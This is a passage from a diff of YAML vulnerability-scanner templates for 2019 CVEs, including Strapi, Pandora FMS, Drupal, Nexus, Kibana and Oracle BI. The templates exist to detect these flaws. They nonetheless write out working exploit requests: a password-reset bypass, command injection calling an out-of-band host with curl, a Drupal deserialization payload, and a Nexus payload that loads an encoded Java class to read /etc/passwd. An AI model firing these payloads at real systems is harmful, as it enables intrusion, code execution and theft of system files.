9.8 cve-id: CVE-2019-18818 cwe-id: CWE-640 - tags: cve,cve2019,strapi,auth-bypass,intrusive + epss-score: 0.87514 + epss-percentile: 0.98345 + cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: strapi + product: strapi + tags: cve2019,strapi,auth-bypass,intrusive,edb,cve -requests: +http: - raw: - | POST /admin/auth/reset-password HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/json + {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word + part: header words: - "application/json" - part: header - type: word - condition: and + part: body words: - '"username":' - '"email":' - '"jwt":' - part: body + condition: and + + - type: status + status: + - 200 extractors: - type: json @@ -49,4 +62,4 @@ requests: - .user.username - .user.email -# Enhanced by mp on 2022/04/01 +# digest: 4a0a0047304502210081df5f0cc32786ad71128c32c5945d41ec5dbaf6f6daf949f754ec1f9df4367002202160172b4b62ebc8db475dd8f76b98b8332cbd826c48acc8ba3bb34ff5798525:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2019-19824.yaml b/poc/cve/CVE-2019-19824.yaml index a1631ebcf3..6ae24e6e21 100644 --- a/poc/cve/CVE-2019-19824.yaml +++ b/poc/cve/CVE-2019-19824.yaml @@ -1,33 +1,22 @@ id: CVE-2019-19824 info: - name: TOTOLINK Realtek SD Routers - Remote Command Injection + name: TOTOLINK - Remote Code Execution author: gy741 severity: high - description: | - TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. - remediation: | - Apply the latest firmware update provided by the vendor to fix the vulnerability. + description: On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. reference: - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html - - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits - https://nvd.nist.gov/vuln/detail/CVE-2019-19824 - - https://sploit.tech + - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-19824 cwe-id: CWE-78 - epss-score: 0.96678 - epss-percentile: 0.99548 - cpe: cpe:2.3:o:totolink:a3002ru_firmware:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: totolink - product: a3002ru_firmware tags: cve,cve2019,totolink,rce,router -http: +requests: - raw: - | POST /boafrm/formSysCmd HTTP/1.1 @@ -42,4 +31,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a00463044022064de6d01187e0885b3a902bc00eb89828ebbaa98bd7daac7e3e63860425ed46f022027b7199ac8c6ab75e78b4d329d0bb9ce383013337c3a4a8c7c5c3d6e45e481de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-20210.yaml b/poc/cve/CVE-2019-20210.yaml index c67f24fd4e..43994e7cf1 100644 --- a/poc/cve/CVE-2019-20210.yaml +++ b/poc/cve/CVE-2019-20210.yaml @@ -1,39 +1,25 @@ id: CVE-2019-20210 - info: - name: WordPress CTHthemes - Cross-Site Scripting + name: CTHthemes CityBook < 2.3.4 - Reflected XSS author: edoardottt severity: medium description: | - WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query. - remediation: | - Update to the latest version of the WordPress CTHthemes plugin, which includes a fix for this vulnerability. + The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Reflected XSS via a search query. reference: - https://wpscan.com/vulnerability/10013 + - https://nvd.nist.gov/vuln/detail/CVE-2019-20210 - https://wpvulndb.com/vulnerabilities/10018 - https://cxsecurity.com/issue/WLB-2019120112 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20210 - - https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-20210 cwe-id: CWE-79 - epss-score: 0.00822 - epss-percentile: 0.79929 - cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: cththemes - product: citybook - framework: wordpress - tags: wp-theme,wpscan,cve,cve2019,wordpress,citybook,xss - -http: + tags: cve,cve2019,wordpress,citybook,xss,wp-theme +requests: - method: GET path: - "{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=" - matchers-condition: and matchers: - type: word @@ -42,13 +28,10 @@ http: - "" - "/wp-content/themes/citybook" condition: and - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a00483046022100d80c1251bd4d64c82d4d0b040ee6b2a646ecf3b597fa5dd40a4dbdbfc6886398022100e3c4c61f29e42d044684bea42900c22d46e9ece63fde4566d3882cab59a41f31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-20224.yaml b/poc/cve/CVE-2019-20224.yaml index 737adc003e..b7a2d0559b 100644 --- a/poc/cve/CVE-2019-20224.yaml +++ b/poc/cve/CVE-2019-20224.yaml @@ -1,33 +1,23 @@ id: CVE-2019-20224 - info: name: Pandora FMS 7.0NG - Remote Command Injection author: ritikchaddha severity: high description: | Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. - remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. reference: - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view - - https://pandorafms.com/downloads/solved-pandorafms-742.mp4 + remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-20224 cwe-id: CWE-78 - epss-score: 0.2078 - epss-percentile: 0.95889 - cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: artica - product: pandora_fms tags: pandorafms,rce,cve,cve2019,authenticated,oast - -http: +requests: - raw: - | POST /pandora_console/index.php?login=1 HTTP/1.1 @@ -41,19 +31,18 @@ http: Content-Type: application/x-www-form-urlencoded date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw - - host-redirects: true + cookie-reuse: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word - name: "http" part: interactsh_protocol + name: http words: - "http" - - type: status status: - 200 -# digest: 4a0a00473045022100a0a40e69b720f4bd72cf7c2de38273f300a1d491e84a05bba10d06c0576d89eb022072a7eae7e7ce0b0433a99c4a98c6758137894bd28ab05eee6cbf9555dba01d71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/17 diff --git a/poc/cve/CVE-2019-20933.yaml b/poc/cve/CVE-2019-20933.yaml index c690a67121..99d7f8fd43 100644 --- a/poc/cve/CVE-2019-20933.yaml +++ b/poc/cve/CVE-2019-20933.yaml @@ -1,32 +1,48 @@ id: CVE-2019-20933 + info: - name: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret - author: c-sh0 + name: InfluxDB <1.7.6 - Authentication Bypass + author: pussycat0x,c-sh0 severity: critical + description: InfluxDB before 1.7.6 contains an authentication bypass vulnerability via the authenticate function in services/httpd/handler.go. A JWT token may have an empty SharedSecret (aka shared secret). An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Update Influxdb to version 1.7.6~rc0-1 or higher. reference: + - https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20933 + - https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6 - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 - - https://github.com/influxdata/influxdb/issues/12927 - - https://github.com/c-sh0/security/blob/master/influxdb.txt + - https://github.com/influxdata/influxdb/commit/761b557315ff9c1642cf3b0e5797cd3d983a24c0 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2019-20933 cwe-id: CWE-287 - tags: cve,cve-2019,influxdb,auth-bypass -requests: + epss-score: 0.03528 + epss-percentile: 0.90551 + cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: influxdata + product: influxdb + shodan-query: InfluxDB + tags: unauth,db,influxdb,misconfig + +http: - method: GET path: - - "{{BaseURL}}/query?q=SHOW%20DATABASES" - headers: - Authorization: Bearer {{token}} + - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: body words: - '"results":' - '"name":"databases"' condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100a969a3ed276185e838c99ee844be26917a2a1313596974010b23c260eff4f52f022046190c8fa491950525a0dcd494aca4a29398efd0f4f97910bf3923a0193097a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-2616.yaml b/poc/cve/CVE-2019-2616.yaml index 8575f8f378..f6c8aa1ffb 100644 --- a/poc/cve/CVE-2019-2616.yaml +++ b/poc/cve/CVE-2019-2616.yaml @@ -1,30 +1,19 @@ id: CVE-2019-2616 - info: - name: Oracle Business Intelligence/XML Publisher - XML External Entity Injection + name: XXE in Oracle Business Intelligence and XML Publisher author: pdteam severity: high - description: Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack. - remediation: | - Apply the necessary patches or updates provided by Oracle to fix this vulnerability. + description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - https://www.exploit-db.com/exploits/46729 - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2019-2616 - epss-score: 0.93837 - epss-percentile: 0.9891 - cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: oracle - product: business_intelligence_publisher - tags: cve,cve2019,oracle,xxe,oast,kev,edb - -http: + tags: cve,cve2019,oracle,xxe,oast,kev +requests: - raw: - | POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 @@ -33,10 +22,8 @@ http: Content-Type: text/xml; charset=UTF-8 - matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502204ebea11db80f8573b9fe135a69fb43402356bdb57922e77068dd3985fd4a5116022100e3c65b6c6eaac40895c8605e6dd6c0da08c791b28ba29c62a4cb40192f5a96bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-2767.yaml b/poc/cve/CVE-2019-2767.yaml index d56e4987ba..bf1dcb703f 100644 --- a/poc/cve/CVE-2019-2767.yaml +++ b/poc/cve/CVE-2019-2767.yaml @@ -1,30 +1,20 @@ id: CVE-2019-2767 info: - name: Oracle Business Intelligence Publisher - XML External Entity Injection + name: Oracle Business Intelligence - Publisher XXE author: madrobot severity: high - description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher. - remediation: | - Apply the latest security patches provided by Oracle to fix this vulnerability. + description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. reference: - - https://www.exploit-db.com/exploits/46729 - - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 + - https://www.exploit-db.com/exploits/46729 + tags: cve,cve2019,oracle,xxe,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-score: 7.20 cve-id: CVE-2019-2767 - epss-score: 0.14972 - epss-percentile: 0.95265 - cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: oracle - product: bi_publisher - tags: edb,cve,cve2019,oracle,xxe,oast -http: +requests: - raw: - | GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1 @@ -35,4 +25,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402205872d89e6bedfd4695376f1b2b870b2f26b4cd1de9e1e7a7f98d95bd70e5da32022032b4ebfabd03e6141fd438fd0e40fec4e12db2f0f124f8f3e81206fce5700566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-6340.yaml b/poc/cve/CVE-2019-6340.yaml index e6d6680309..28e4bf0974 100644 --- a/poc/cve/CVE-2019-6340.yaml +++ b/poc/cve/CVE-2019-6340.yaml @@ -1,34 +1,51 @@ id: CVE-2019-6340 + info: - name: Drupal 8 core RESTful Web Services RCE + name: Drupal - Remote Code Execution author: madrobot severity: high - description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. + description: Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases. + remediation: | + Apply the official security patch provided by Drupal to fix the deserialization vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-6340 - https://www.drupal.org/sa-core-2019-003 - - http://web.archive.org/web/20210125004201/https://www.securityfocus.com/bid/107106/ - https://www.synology.com/security/advisory/Synology_SA_19_09 + - https://nvd.nist.gov/vuln/detail/CVE-2019-6340 + - https://www.exploit-db.com/exploits/46452/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2019-6340 cwe-id: CWE-502 + epss-score: 0.97484 + epss-percentile: 0.99967 + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: drupal + product: drupal + shodan-query: http.component:"drupal" tags: cve,cve2019,drupal,rce,kev -requests: + +http: - method: POST path: - '{{BaseURL}}/node/1?_format=hal_json' + body: '{ "link": [ { "value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" } ], "_links": { "type": { "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" } } }' + matchers-condition: and matchers: - type: word + part: body words: - "uid=" - "gid=" - "groups=" condition: and - part: body + - type: status status: - 200 + +# digest: 4b0a00483046022100cff2952f0ae8495a2290acc3ee01fa48296f8bfb34ecb5e6fae07cc11e177efe022100b8b3cab46c9b68856038b09f21feb4985990bff27e31d18461ff6d6930f1efd0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2019-7238.yaml b/poc/cve/CVE-2019-7238.yaml index e6d8c9427e..fc82673765 100644 --- a/poc/cve/CVE-2019-7238.yaml +++ b/poc/cve/CVE-2019-7238.yaml @@ -1,20 +1,30 @@ id: CVE-2019-7238 info: - name: NEXUS < 3.14.0 Remote Code Execution + name: Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution author: pikpikcu severity: critical - tags: cve,cve2019,nexus,rce + description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution. + remediation: | + Upgrade Sonatype Nexus Repository Manager to a version higher than 3.15.0. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 - https://github.com/jas502n/CVE-2019-7238 + - https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019 + - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2019-7238 - description: "Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control." + epss-score: 0.97422 + epss-percentile: 0.99923 + cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: sonatype + product: nexus + tags: cve,cve2019,nexus,rce,kev -requests: +http: - raw: - | POST /service/extdirect HTTP/1.1 @@ -24,14 +34,14 @@ requests: {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} - matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: - 200 +# digest: 490a0046304402200c1b5dd410d203ff883f0a3d3fb1a599927754d015739c8040a91108820696db02203d95ded379f7102523203db7a93cad306563b9f707bca8525d3565636cd1d1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-7609.yaml b/poc/cve/CVE-2019-7609.yaml index dc14d4219e..b3985eb7e2 100644 --- a/poc/cve/CVE-2019-7609.yaml +++ b/poc/cve/CVE-2019-7609.yaml @@ -1,35 +1,56 @@ id: CVE-2019-7609 + info: - name: Kibana Timelion Arbitrary Code Execution + name: Kibana Timelion - Arbitrary Code Execution author: dwisiswant0 severity: critical description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + remediation: | + Apply the latest security patches or upgrade to a patched version of Kibana to mitigate the vulnerability. reference: - https://github.com/mpgn/CVE-2019-7609 - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 - tags: cve,cve2019,kibana,rce + - https://nvd.nist.gov/vuln/detail/CVE-2019-7609 + - https://www.elastic.co/community/security + - https://access.redhat.com/errata/RHBA-2019:2824 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.00 + cvss-score: 10 cve-id: CVE-2019-7609 cwe-id: CWE-94 -requests: + epss-score: 0.96365 + epss-percentile: 0.99425 + cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: elastic + product: kibana + tags: cve,cve2019,kibana,rce,kev + +http: - method: POST path: - "{{BaseURL}}/api/timelion/run" + + body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}' + headers: Content-Type: "application/json; charset=utf-8" - body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}' + matchers-condition: and matchers: - type: word + part: body words: - "seriesList" - part: body + - type: word + part: header words: - "application/json" - part: header + - type: status status: - 200 + +# digest: 4a0a004730450221008b1f553204c6827d61235a510f63ee04de3339b1c37fc2ce692c3040bbd3c74d02201f382a69ae911a521674bc680cbaa2122361ffd958e7322ec3bde38075b347ee:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2019-8446.yaml b/poc/cve/CVE-2019-8446.yaml index a9ac2017f2..99959daaf4 100644 --- a/poc/cve/CVE-2019-8446.yaml +++ b/poc/cve/CVE-2019-8446.yaml @@ -2,30 +2,20 @@ id: CVE-2019-8446 info: name: Jira Improper Authorization + description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check. author: dhiyaneshDk severity: medium - description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check. - remediation: | - Apply the latest security patches and updates provided by Atlassian to fix the vulnerability. - reference: - - https://jira.atlassian.com/browse/JRASERVER-69777 - - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839 + tags: cve,cve2019,jira classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2019-8446 cwe-id: CWE-863 - epss-score: 